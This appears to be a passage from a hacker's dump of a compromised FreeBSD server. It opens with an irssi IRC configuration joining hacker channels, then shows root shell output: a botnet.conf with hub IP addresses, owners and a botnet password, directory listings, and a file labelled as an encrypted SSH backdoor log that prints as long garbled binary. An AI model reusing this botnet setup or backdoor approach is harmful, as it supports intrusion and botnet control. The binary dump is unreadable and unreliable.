{ address = "irc.openprojects.net"; chatnet = "OPN"; port = "6667"; },
{ address = "irc.gnome.org"; chatnet = "GIMPNet"; port = "6667"; },
{ address = "irc.ptlink.net"; chatnet = "PTlink"; port = "6667"; },
{ address = "silc.pspt.fi"; chatnet = "SILC"; port = "706"; },
{
address = "irc.securitychat.org";
chatnet = "secchat";
port = "6667";
autoconnect = "yes";
nick = "RoMeO";
},
{
address = "irc.blackhat-forums.com";
chatnet = "bhf";
port = "6667";
autoconnect = "yes";
nick = "RoMeO";
},
{
address = "irc.tdirc.net";
chatnet = "tdirc";
port = "6667";
autoconnect = "yes";
nick = "RoMeO";
}
);
chatnets = {
IRCNet = {
type = "IRC";
max_kicks = "4";
max_modes = "3";
max_msgs = "5";
max_whois = "4";
max_query_chans = "5";
};
EFNet = {
type = "IRC";
max_kicks = "4";
max_modes = "4";
max_msgs = "3";
};
Undernet = {
type = "IRC";
max_kicks = "4";
max_modes = "3";
max_msgs = "3";
};
DALNet = {
type = "IRC";
max_kicks = "4";
max_modes = "6";
max_msgs = "3";
};
OPN = { type = "IRC"; max_kicks = "4"; max_modes = "4"; max_msgs = "1"; };
GIMPNet = {
type = "IRC";
max_kicks = "4";
max_modes = "4";
max_msgs = "3";
};
PTLink = {
type = "IRC";
max_kicks = "1";
max_modes = "6";
max_msgs = "100";
};
SILC = { type = "SILC"; };
secchat = { type = "IRC"; };
bhf = { type = "IRC"; };
tdirc = { type = "IRC"; };
};
channels = (
{ name = "#bhf"; chatnet = "bhf"; autojoin = "yes"; },
{ name = "#r00tsecurity"; chatnet = "tdirc"; autojoin = "yes"; },
{ name = "#thedefaced"; chatnet = "tdirc"; autojoin = "yes"; },
{ name = "#zer0zone"; chatnet = "tdirc"; autojoin = "yes"; },
{ name = "#darkmindz"; chatnet = "secchat"; autojoin = "yes"; },
{ name = "#astalavista"; chatnet = "secchat"; autojoin = "yes"; },
{ name = "#kinqpinz"; chatnet = "secchat"; autojoin = "yes"; },
{ name = "#gso-chat"; chatnet = "bhf"; autojoin = "yes"; }
);
aliases = {
J = "join";
WJOIN = "join -window";
WQUERY = "query -window";
LEAVE = "part";
BYE = "quit";
EXIT = "quit";
SIGNOFF = "quit";
DESCRIBE = "action";
DATE = "time";
HOST = "userhost";
LAST = "lastlog";
SAY = "msg *";
WI = "whois";
WII = "whois $0 $0";
WW = "whowas";
W = "who";
N = "names";
M = "msg";
T = "topic";
C = "clear";
CL = "clear";
K = "kick";
KB = "kickban";
KN = "knockout";
BANS = "ban";
B = "ban";
MUB = "unban *";
UB = "unban";
IG = "ignore";
UNIG = "unignore";
SB = "scrollback";
UMODE = "mode $N";
WC = "window close";
WN = "window new hide";
SV = "say Irssi $J ($V) - http://irssi.org/";
GOTO = "sb goto";
CHAT = "dcc chat";
RUN = "SCRIPT LOAD";
SBAR = "STATUSBAR";
INVITELIST = "mode $C +I";
};
statusbar = {
# formats:
# when using {templates}, the template is shown only if its argument isnt
# empty unless no argument is given. for example {sb} is printed always,
# but {sb $T} is printed only if $T isnt empty.
items = {
# start/end text in statusbars
barstart = "{sbstart}";
barend = "{sbend}";
# treated "normally", you could change the time/user name to whatever
time = "{sb $Z}";
user = "{sb $cumode$N{sbmode $usermode}{sbaway $A}}";
# treated specially .. window is printed with non-empty windows,
# window_empty is printed with empty windows
window = "{sb $winref:$T{sbmode $M}}";
window_empty = "{sb $winref{sbservertag $tag}}";
prompt = "{prompt $[.15]T}";
prompt_empty = "{prompt $winname}";
topic = " $topic";
topic_empty = " Irssi v$J - http://irssi.org/help/";
# all of these treated specially, theyre only displayed when needed
lag = "{sb Lag: $0-}";
act = "{sb Act: $0-}";
more = "-- more --";
};
# theres two type of statusbars. root statusbars are either at the top
# of the screen or at the bottom of the screen. window statusbars are at
# the top/bottom of each split window in screen.
default = {
# the "default statusbar" to be displayed at the bottom of the window.
# contains all the normal items.
window = {
disabled = "no";
# window, root
type = "window";
# top, bottom
placement = "bottom";
# number
position = "1";
# active, inactive, always
visible = "active";
# list of items in statusbar in the display order
items = {
barstart = { priority = "100"; };
time = { };
user = { };
window = { };
window_empty = { };
lag = { priority = "-1"; };
act = { priority = "10"; };
more = { priority = "-1"; alignment = "right"; };
barend = { priority = "100"; alignment = "right"; };
};
};
# statusbar to use in inactive split windows
window_inact = {
type = "window";
placement = "bottom";
position = "1";
visible = "inactive";
items = {
barstart = { priority = "100"; };
window = { };
window_empty = { };
more = { priority = "-1"; alignment = "right"; };
barend = { priority = "100"; alignment = "right"; };
};
};
# we treat input line as yet another statusbar :) Its possible to
# add other items before or after the input line item.
prompt = {
type = "root";
placement = "bottom";
# we want to be at the bottom always
position = "100";
visible = "always";
items = {
prompt = { priority = "-1"; };
prompt_empty = { priority = "-1"; };
# treated specially, this is the real input line.
input = { priority = "10"; };
};
};
# topicbar
topic = {
type = "root";
placement = "top";
position = "1";
visible = "always";
items = {
barstart = { priority = "100"; };
topic = { };
topic_empty = { };
barend = { priority = "100"; alignment = "right"; };
};
};
};
};
settings = {
core = {
real_name = "romeo haxxor"; // "romeo haxxed"
user_name = "RoMeO";
nick = "RoMeO";
timestamp_format = "%H:%M:%S";
hostname = "absolute.ownage.net"; // absolutely owned..
};
"fe-common/core" = {
autolog = "no";
autolog_path = "~/irclogs/$tag/$0-%m%y.log";
show_nickmode_empty = "yes";
theme = "pandemonium";
autocreate_own_query = "no";
autocreate_query_level = "DCCMSGS";
use_status_window = "no";
use_msgs_window = "yes";
};
"fe-text" = {
colors = "yes";
autostick_split_windows = "yes";
actlist_sort = "refnum";
};
};
logs = { };
ignores = ( );
keyboard = (
{ key = "meta-1"; id = "change_window"; data = "1"; },
{ key = "meta-2"; id = "change_window"; data = "2"; },
{ key = "meta-3"; id = "change_window"; data = "3"; },
{ key = "meta-4"; id = "change_window"; data = "4"; },
{ key = "meta-5"; id = "change_window"; data = "5"; },
{ key = "meta-6"; id = "change_window"; data = "6"; },
{ key = "meta-7"; id = "change_window"; data = "7"; },
{ key = "meta-8"; id = "change_window"; data = "8"; },
{ key = "meta-9"; id = "change_window"; data = "9"; },
{ key = "meta-0"; id = "change_window"; data = "10"; }
);
hilights = (
{ text = "RoMeO"; nick = "yes"; word = "yes"; },
{ text = "darkmindz"; nick = "yes"; word = "yes"; },
{ text = "antisec"; nick = "yes"; word = "yes"; },
{ text = "anti-sec"; nick = "yes"; word = "yes"; },
{ text = "zf0"; nick = "yes"; word = "yes"; },
{ text = "strayfe"; nick = "yes"; word = "yes"; },
{ text = "n3w7yp3"; nick = "yes"; word = "yes"; },
{ text = "copyandpaste"; nick = "yes"; word = "yes"; },
{ text = "blackhat"; nick = "yes"; word = "yes"; },
{ text = "whitehat"; nick = "yes"; word = "yes"; },
{ text = "b0rx"; nick = "yes"; word = "yes"; }
); // I wonder.. zf0?.. Lulz
windows = {
1 = { };
2 = {
immortal = "yes";
name = "(msgs)";
level = "MSGS ACTIONS DCCMSGS";
};
3 = {
items = (
{
type = "CHANNEL";
chat_type = "IRC";
name = "#bhf";
tag = "bhf";
}
);
};
4 = {
items = (
{
type = "CHANNEL";
chat_type = "IRC";
name = "#gso-chat";
tag = "bhf";
}
);
};
5 = {
items = (
{
type = "CHANNEL";
chat_type = "IRC";
name = "#r00tsecurity";
tag = "tdirc";
}
);
};
6 = {
items = (
{
type = "CHANNEL";
chat_type = "IRC";
name = "#thedefaced";
tag = "tdirc";
}
);
};
7 = {
items = (
{
type = "CHANNEL";
chat_type = "IRC";
name = "#zer0zone";
tag = "tdirc";
}
);
};
8 = {
items = (
{
type = "CHANNEL";
chat_type = "IRC";
name = "#kinqpinz";
tag = "secchat";
}
);
};
9 = {
items = (
{
type = "CHANNEL";
chat_type = "IRC";
name = "#darkmindz";
tag = "secchat";
}
);
};
10 = {
items = (
{
type = "CHANNEL";
chat_type = "IRC";
name = "#astalavista";
tag = "secchat";
}
);
};
};
mainwindows = { 1 = { first_line = "1"; lines = "49"; }; };
[root@velocity:/tmp/...]# cat botnet.conf
set harryhub "hub 69.42.223.68:7100" ; # the hub ("hubnick ipadress:port")
set harryahub "otis 12.226.117.109:7100" ; # the hub ("althubnick ipadress:port")
set offlinehub 1 ; # run bot in limbomode (1/0) (VERY recomended)
set owner "shoes , rizo" ; # owner(s) ("Jmns")
set botnet_pass "xxlgertg51515150rwf0" ; # just set this to some rand string
set usemsgcmd 0 ; # Enable msg commands (1/0) (not recomended)
source harry.tcl
[root@velocity:/tmp/...]#
[root@velocity:/]# ls -la
total 129
drwxr-xr-x 22 root wheel 512 Jun 29 16:00 ./
drwxr-xr-x 22 root wheel 512 Jun 29 16:00 ../
-rw-r--r-- 2 root wheel 801 Jan 12 2007 .cshrc
drwxr-xr-x 2 root wheel 512 Jun 29 16:00 .dev/
-rw-r--r-- 2 root wheel 251 Jan 12 2007 .profile
drwxrwxr-x 2 root operator 512 Apr 12 2007 .snap/
-r--r--r-- 1 root wheel 6196 Jan 12 2007 COPYRIGHT
drwxr-xr-x 2 root wheel 1024 Apr 16 2007 bin/
drwxr-xr-x 6 root wheel 512 Apr 16 2007 boot/
drwxr-xr-x 2 root wheel 512 Apr 12 2007 cdrom/
lrwxr-xr-x 1 root wheel 10 Apr 12 2007 compat@ -> usr/compat
dr-xr-xr-x 4 root wheel 512 Dec 31 1969 dev/
drwxr-xr-x 2 root wheel 512 Apr 12 2007 dist/
-rw------- 1 root wheel 4096 Apr 16 2007 entropy
drwxr-xr-x 19 root wheel 2048 Jun 28 21:09 etc/
lrwxrwxrwx 1 root wheel 8 Apr 12 2007 home@ -> usr/home
drwxr-xr-x 2 root wheel 512 Apr 12 2007 home2/
-rw-r--r-- 1 root wheel 0 Oct 5 2007 jj.log
lrwxr-xr-x 1 root wheel 22 Apr 15 2007 kernconf@ -> /usr/src/sys/i386/conf
drwxr-xr-x 3 root wheel 1024 Nov 5 2008 lib/
drwxr-xr-x 2 root wheel 512 Apr 16 2007 libexec/
drwxr-xr-x 2 root wheel 512 Jan 12 2007 media/
drwxr-xr-x 2 root wheel 512 Jan 12 2007 mnt/
dr-xr-xr-x 2 root wheel 512 Jan 12 2007 proc/
drwxr-xr-x 2 root wheel 2560 Nov 5 2008 rescue/
drwxr-xr-x 6 root wheel 512 Jun 29 08:26 root/
drwxr-xr-x 2 root wheel 2560 Apr 16 2007 sbin/
lrwxr-xr-x 1 root wheel 11 Apr 16 2007 sys@ -> usr/src/sys
drwxrwxrwt 103 root wheel 3072 Jun 29 16:00 tmp/
drwxr-xr-x 24 root wheel 512 Jun 15 07:35 usr/
drwxr-xr-x 24 root wheel 512 Jun 15 05:05 var/
[root@velocity:/var/run]# ls -la
total 112
drwxr-xr-x 5 root wheel 512 Jun 26 21:20 ./
drwxr-xr-x 24 root wheel 512 Jun 15 05:05 ../
-rw-r--r-- 1 root wheel 0 Jun 25 11:08 a.out
-rw------- 1 root wheel 0 Jun 25 15:43 as.core
-rw------- 1 root wheel 3 Jan 27 2008 cron.pid
-rw-r--r-- 1 root wheel 4 Jan 27 2008 devd.pid
srw-rw-rw- 1 root wheel 0 Jan 27 2008 devd.pipe=
-rw-r--r-- 1 root wheel 5659 Jan 27 2008 dmesg.boot
-rw------- 1 root wheel 5 Jun 25 08:57 inetd.pid
-r--r--r-- 1 root wheel 245 Jun 23 23:21 ld-elf.so.hints
-r--r--r-- 1 root wheel 67 Jan 27 2008 ld.so.hints
srw-rw-rw- 1 root wheel 0 Jan 27 2008 log=
srw------- 1 root wheel 0 Jan 27 2008 logpriv=
drwxr-xr-x 2 bind bind 512 Jan 12 2007 named/
drwxrwx--- 2 root network 512 Jan 12 2007 ppp/
drwxr-xr-x 2 root wheel 512 Jan 27 2008 proftpd/
-rw-r--r-- 1 root wheel 4 Jan 27 2008 proftpd.pid
-rw-r--r-- 1 root wheel 14776 Jun 26 20:09 proftpd.scoreboard
-rw------- 1 root wheel 78 Jan 27 2008 sendmail.pid
-rw-rw-rw- 1 root wheel 2930 Jun 26 18:08 ssh.old // Backdoor _encrypted_ log file
-rw-r--r-- 1 root wheel 6 Jun 17 18:29 sshd.pid
-rw------- 1 root wheel 3 Jan 27 2008 syslog.pid
-rw-r--r-- 1 root wheel 0 Jan 27 2008 syslogd.sockets
-rw-r--r-- 1 root wheel 1496 Jun 26 21:31 utmp
[root@velocity:/var/run]#
[root@velocity:/var/run]# cat ssh.old
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#415;<3B><>&#146;&#154;<3B>&#349;&#138;&#409;&#149;<3B>&#152;<3B>&#65533;<3B><><EFBFBD>&#415;<3B>&#150;&#146;<3B>&#150;&#145;&#149;&#152;&#398;&#140;&#140;&#152;&#134;&#997;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#65533;<3B><><EFBFBD>&#415;&#150;<3B><>&#147;&#154;&#135;&#374;&#1438;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#65533;<3B><><EFBFBD>&#415;&#150;<3B><>&#147;&#154;&#135;&#374;&#1438;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#65533;<3B><><EFBFBD>&#415;&#156;<3B>&#138;<3B>&#147;<3B>&#137;&#154;<3B><>&#158;&#1013;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#415;&#156;<3B>&#138;<3B>&#147;<3B>&#137;&#154;<3B><>&#158;&#1013;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#415;&#156;&#151;&#158;<3B>&#140;&#965;&#146;&#158;&#1038;&#843;&#151;&#65533;<3B><><EFBFBD>&#415;&#134;&#158;&#142;&#138;&#150;&#140;&#348;&#147;<3B>&#140;&#154;<3B>&#154;<3B>&#147;&#134;&#778;&#693;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#415;&#140;&#146;&#158;&#140;&#151;&#337;&#920;&#136;&#151;&#973;&#154;&#65533;<3B><><EFBFBD><EFBFBD>&#415;&#455;&#1166;&#907;&#1166;&#585;&#1160;&#671;&#156;&#134;&#156;&#147;&#154;&#331;&#1039;<3B>&#565;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#415;&#455;&#1166;&#461;&#1165;&#777;&#1160;&#1055;&#147;&#158;&#152;&#347;<3B><><EFBFBD><EFBFBD>&#150;&#145;&#140;&#151;&#150;&#139;&#147;&#150;&#148;&#154;&#158;&#145;&#158;&#147;&#150;&#154;&#145;&#65533;<3B><><EFBFBD><EFBFBD>&#415;&#455;&#1166;&#461;&#1165;&#777;&#1160;&#1055;&#147;&#158;&#152;&#347;<3B><><EFBFBD><EFBFBD>&#150;&#145;&#140;&#151;&#150;&#139;&#147;&#150;&#148;&#154;&#158;&#145;&#158;&#147;&#150;&#154;&#145;&#65533;<3B><><EFBFBD><EFBFBD>&#415;&#455;&#1166;&#461;&#1165;&#777;&#1160;&#1055;&#147;&#347;<3B><><EFBFBD><EFBFBD>&#150;&#145;&#140;&#151;&#150;&#139;&#147;&#150;&#148;&#154;&#158;&#145;&#158;&#147;&#150;&#154;&#145;&#65533;<3B><><EFBFBD><EFBFBD>&#415;&#455;&#1166;&#461;&#1165;&#777;&#1160;&#1055;&#147;&#158;&#152;&#329;&#158;&#145;&#150;&#139;&#134;&#1030;&#65533;<3B><><EFBFBD><EFBFBD>&#415;&#455;&#1166;&#461;&#1165;&#777;&#1160;&#1055;&#147;&#158;&#152;&#329;&#158;&#145;&#150;&#139;&#134;&#1030;&#65533;<3B><><EFBFBD>&#415;&#150;<3B><>&#147;&#154;&#135;&#374;&#1438;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#65533;<3B><><EFBFBD>&#415;&#150;<3B><>&#147;&#154;&#135;&#374;&#1438;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#65533;<3B><><EFBFBD>&#415;&#150;<3B><>&#147;&#154;&#135;&#374;&#1438;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#65533;<3B><><EFBFBD>&#415;&#146;&#158;&#139;&#139;&#325;&#154;&#155;&#158;&#1037;&#65533;<3B><><EFBFBD>&#415;&#146;&#158;&#139;&#139;&#325;&#154;&#155;&#158;&#1037;&#65533;<3B><><EFBFBD>&#415;&#146;&#158;&#139;&#139;&#325;&#154;&#155;&#158;&#1037;&#65533;<3B><><EFBFBD>&#415;&#146;&#158;&#139;&#139;&#325;&#154;&#155;&#158;&#1037;&#65533;<3B><><EFBFBD>&#415;&#150;<3B><>&#147;&#154;&#135;&#374;&#1438;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#65533;<3B><><EFBFBD>&#415;&#150;<3B><>&#147;&#154;&#135;&#374;&#1438;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#65533;<3B><><EFBFBD>&#415;&#150;<3B><>&#147;&#154;&#135;&#374;&#1438;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#65533;<3B><><EFBFBD>&#415;&#146;&#158;&#139;&#139;&#325;&#154;&#155;&#158;&#1037;&#65533;<3B><><EFBFBD>&#415;&#134;&#158;&#142;&#138;&#150;&#140;&#348;&#147;<3B>&#140;&#154;<3B>&#154;<3B>&#147;&#134;&#778;&#693;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#415;<3B>&#140;&#134;&#156;<3B>&#133;&#341;&#154;&#147;&#154;&#140;&#138;&#150;&#140;&#65533;<3B><><EFBFBD>&#415;<3B>&#140;&#134;&#156;<3B>&#133;&#341;&#154;&#147;&#154;&#140;&#138;&#150;&#140;&#65533;<3B><><EFBFBD>&#415;&#134;&#158;&#142;&#138;&#150;&#140;&#348;&#147;<3B>&#140;&#154;<3B>&#154;<3B>&#147;&#134;&#778;&#693;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#415;&#150;<3B><>&#147;&#154;&#135;&#374;&#1438;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#65533;<3B><><EFBFBD>&#415;&#134;&#158;&#142;&#138;&#150;&#140;&#348;&#147;<3B>&#140;&#154;<3B>&#154;<3B>&#147;&#134;&#778;&#693;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#415;&#148;<3B>&#138;&#158;<3B><>&#158;&#350;&#140;&#147;&#140;&#1030;&#908;&#65533;<3B><><EFBFBD>&#415;<3B>&#146;&#152;&#136;&#139;&#153;&#337;<3B>&#148;&#150;&#158;&#133;&#65533;<3B><><EFBFBD>&#415;&#150;<3B><>&#147;&#154;&#135;&#374;&#1438;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#65533;<3B><><EFBFBD>&#415;&#134;&#158;&#142;&#138;&#150;&#140;&#348;&#147;<3B>&#140;&#154;<3B>&#154;<3B>&#147;&#134;&#778;&#693;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#415;&#146;&#158;&#139;&#139;&#325;&#154;&#155;&#158;&#1037;&#65533;<3B><><EFBFBD>&#415;&#146;&#158;&#139;&#139;&#325;&#154;&#155;&#158;&#1037;&#65533;<3B><><EFBFBD>&#415;&#146;&#158;&#139;&#139;&#325;&#154;&#155;&#158;&#1037;&#65533;<3B><><EFBFBD>&#415;&#140;&#139;&#154;&#331;&#156;&#135;&#146;&#973;&#973;&#65533;<3B><><EFBFBD>&#415;&#156;&#158;&#133;&#133;&#966;&#654;&#348;&#709;&#133;&#134;&#909;&#156;&#155;&#65533;<3B><><EFBFBD>&#415;&#158;<3B><>&#335;&#158;<3B><>&#147;&#148;&#158;&#65533;<3B><><EFBFBD>&#415;&#158;<3B><>&#335;&#158;<3B><>&#147;&#148;&#158;&#65533;<3B><><EFBFBD>&#415;&#150;<3B><>&#147;&#154;&#135;&#374;&#1438;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#65533;<3B><><EFBFBD>&#415;&#156;&#151;&#158;<3B>&#140;&#965;&#146;&#158;&#1038;&#843;&#151;&#65533;<3B><><EFBFBD>&#415;&#140;&#146;&#158;&#140;&#151;&#337;&#920;&#136;&#151;&#973;&#154;&#65533;<3B><><EFBFBD>&#415;&#148;&#158;&#139;&#140;&#140;&#139;&#348;&#151;&#968;&#1750;&#154;&#65533;<3B><><EFBFBD>&#415;&#148;&#158;&#139;&#140;&#140;&#139;&#348;&#151;&#968;&#1750;&#154;&#65533;<3B><><EFBFBD>&#415;<3B>&#150;&#146;<3B>&#150;&#145;&#149;&#152;&#398;&#140;&#140;&#152;&#134;&#997;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#65533;<3B><><EFBFBD>&#415;<3B>&#150;&#146;<3B>&#150;&#145;&#149;&#152;&#398;&#140;&#140;&#152;&#134;&#997;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#65533;<3B><><EFBFBD>&#415;<3B>&#147;&#148;&#152;<3B>&#158;&#133;&#401;<3B>&#147;&#150;&#145;&#155;&#977;&#65533;<3B><><EFBFBD>&#415;&#148;&#158;&#139;&#140;&#140;&#139;&#348;&#151;&#968;&#1750;&#154;&#65533;<3B><><EFBFBD>&#415;&#148;&#158;&#139;&#140;&#140;&#139;&#348;&#151;&#968;&#1750;&#154;&#65533;<3B><><EFBFBD>&#415;&#150;<3B><>&#147;&#154;&#135;&#374;&#1438;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#65533;<3B><><EFBFBD>&#415;&#158;&#147;&#154;&#135;<3B><>&#337;<3B>&#150;&#133;&#158;<3B>&#139;&#154;&#65533;<3B><><EFBFBD><EFBFBD>&#415;&#967;&#465;&#971;&#1165;&#1034;&#1163;&#927;&#149;&#138;&#145;&#150;<3B><>&#398;&#908;&#65533;<3B><><EFBFBD>&#415;&#150;<3B><>&#147;&#154;&#135;&#374;&#1438;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#65533;<3B><><EFBFBD>&#415;&#150;<3B><>&#147;&#154;&#135;&#374;&#1438;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#65533;<3B><><EFBFBD>&#415;&#148;&#158;&#139;&#140;&#140;&#139;&#348;&#151;&#968;&#1750;&#154;&#65533;<3B><><EFBFBD>&#415;&#148;&#158;&#139;&#140;&#140;&#139;&#348;&#151;&#968;&#1750;&#154;&#65533;<3B><><EFBFBD>&#415;&#148;&#158;&#139;&#140;&#140;&#139;&#348;&#151;&#968;&#1750;&#154;&#65533;<3B><><EFBFBD>&#415;&#150;<3B><>&#147;&#154;&#135;&#374;&#1438;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#65533;<3B><><EFBFBD>&#415;&#150;<3B><>&#147;&#154;&#135;&#374;&#1438;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#65533;<3B><><EFBFBD>&#415;&#156;&#151;&#158;<3B>&#140;&#965;&#146;&#158;&#1038;&#843;&#151;&#65533;<3B><><EFBFBD>&#415;&#146;&#158;&#139;&#139;&#325;&#154;&#155;&#158;&#1037;&#65533;<3B><><EFBFBD>&#415;&#150;<3B><>&#147;&#154;&#135;&#374;&#1438;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#65533;<3B><><EFBFBD>&#415;&#148;&#158;&#139;&#140;&#140;&#139;&#348;&#151;&#968;&#1750;&#154;&#65533;<3B><><EFBFBD>&#415;&#148;&#158;&#139;&#140;&#140;&#139;&#348;&#151;&#968;&#1750;&#154;&#65533;<3B><><EFBFBD>&#415;&#148;&#158;&#139;&#140;&#140;&#139;&#348;&#151;&#968;&#1750;&#154;&#65533;<3B><><EFBFBD>&#415;&#148;&#158;&#139;&#140;&#140;&#139;&#348;&#151;&#968;&#1750;&#154;&#65533;<3B><><EFBFBD>&#415;&#156;&#151;&#158;<3B>&#140;&#965;&#146;&#158;&#1038;&#843;&#151;&#65533;<3B><><EFBFBD>&#415;&#148;&#158;&#139;&#140;&#140;&#139;&#348;&#151;&#968;&#1750;&#154;&#65533;<3B><><EFBFBD>&#415;&#148;&#158;&#139;&#140;&#140;&#139;&#348;&#151;&#968;&#1750;&#154;&#65533;<3B><><EFBFBD>&#415;&#150;<3B><>&#147;&#154;&#135;&#374;&#1438;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#65533;<3B><><EFBFBD>&#415;&#134;&#158;&#142;&#138;&#150;&#140;&#348;&#147;<3B>&#140;&#154;<3B>&#154;<3B>&#147;&#134;&#778;&#693;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#415;&#967;&#465;&#971;&#1165;&#1034;&#1163;&#927;&#149;&#138;&#145;&#150;<3B><>&#398;&#908;&#65533;<3B><><EFBFBD><EFBFBD>&#415;&#455;&#1166;&#907;&#1166;&#585;&#1160;&#671;&#156;&#134;&#156;&#147;&#154;&#331;&#1039;<3B>&#565;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#415;&#150;<3B><>&#147;&#154;&#135;&#374;&#1438;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#65533;<3B><><EFBFBD><EFBFBD>&#415;&#455;&#1166;&#461;&#1165;&#777;&#1160;&#1055;&#156;&#134;&#156;&#147;&#154;&#331;&#1039;<3B>&#565;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#415;&#455;&#1166;&#461;&#1165;&#777;&#1160;&#1055;&#140;&#146;&#158;&#140;&#151;&#337;&#920;&#136;&#151;&#973;&#154;&#65533;<3B><><EFBFBD><EFBFBD>&#415;&#455;&#1166;&#907;&#1166;&#585;&#1160;&#671;&#156;&#134;&#156;&#147;&#154;&#331;&#1039;<3B>&#565;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#415;&#150;<3B><>&#147;&#154;&#135;&#374;&#1438;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#65533;<3B><><EFBFBD><EFBFBD>&#415;&#455;&#1166;&#907;&#1166;&#585;&#1160;&#671;&#156;&#134;&#156;&#147;&#154;&#331;&#1039;<3B>&#565;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#415;&#967;&#465;&#971;&#1165;&#1034;&#1163;&#927;&#149;&#138;&#145;&#150;<3B><>&#398;&#908;&#65533;<3B><><EFBFBD><EFBFBD>&#415;&#967;&#465;&#971;&#1165;&#1034;&#1163;&#927;&#149;&#138;&#145;&#150;<3B><>&#398;&#908;&#65533;<3B><><EFBFBD><EFBFBD>&#415;&#455;&#1166;&#461;&#1165;&#777;&#1160;&#1055;&#140;&#146;&#158;&#140;&#151;&#337;&#920;&#136;&#151;&#973;&#154;&#65533;<3B><><EFBFBD>&#415;&#150;<3B><>&#147;&#154;&#135;&#374;&#1438;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#65533;<3B><><EFBFBD>&#415;&#134;&#158;&#142;&#138;&#150;&#140;&#348;&#147;<3B>&#140;&#154;<3B>&#154;<3B>&#147;&#134;&#778;&#693;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#415;&#518;&#1163;&#657;&#975;&#1041;&#906;&#927;&#156;&#134;&#156;&#147;&#154;&#331;&#1039;&#147;&#565;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#415;&#518;&#1163;&#657;&#975;&#1041;&#906;&#927;&#156;&#134;&#156;&#147;&#154;&#331;&#1039;<3B>&#565;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#415;&#156;&#151;&#158;<3B>&#140;&#965;&#146;&#158;&#1038;&#843;&#151;&#65533;<3B><><EFBFBD>&#415;&#150;<3B><>&#147;&#154;&#135;&#374;&#1438;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#65533;<3B><><EFBFBD>&#415;&#134;&#158;&#142;&#138;&#150;&#140;&#348;&#147;<3B>&#140;&#154;<3B>&#154;<3B>&#147;&#134;&#778;&#693;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#415;&#134;&#158;&#142;&#138;&#150;&#140;&#348;&#147;<3B>&#140;&#154;<3B>&#154;<3B>&#147;&#134;&#778;&#693;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#415;&#648;&#1165;&#906;&#1166;&#781;&#1158;&#543;&#967;&#798;<3B>&#136;&#145;&#139;&#333;<3B><>&#156;<3B>&#1226;&#741;<3B>&#65533;<3B><><EFBFBD><EFBFBD>&#415;&#455;&#1166;&#907;&#1166;&#585;&#1160;&#671;&#156;&#134;<3B>&#154;<3B>&#331;&#1039;<3B>&#565;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#415;&#518;&#1163;&#657;&#975;&#1041;&#906;&#927;&#156;&#134;<3B>&#154;<3B>&#331;&#1039;&#147;&#565;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#415;&#455;&#1166;&#907;&#1166;&#585;&#1160;&#671;&#156;&#134;&#156;&#147;&#154;&#331;&#1039;&#147;&#565;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#415;&#455;&#1166;&#907;&#1166;&#585;&#1160;&#671;&#156;&#134;&#156;&#147;&#154;&#331;&#1039;<3B>&#565;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&#415;&#150;<3B><>&#147;&#154;&#135;&#374;&#1438;<3B><><EFBFBD><EFBFBD><EFBF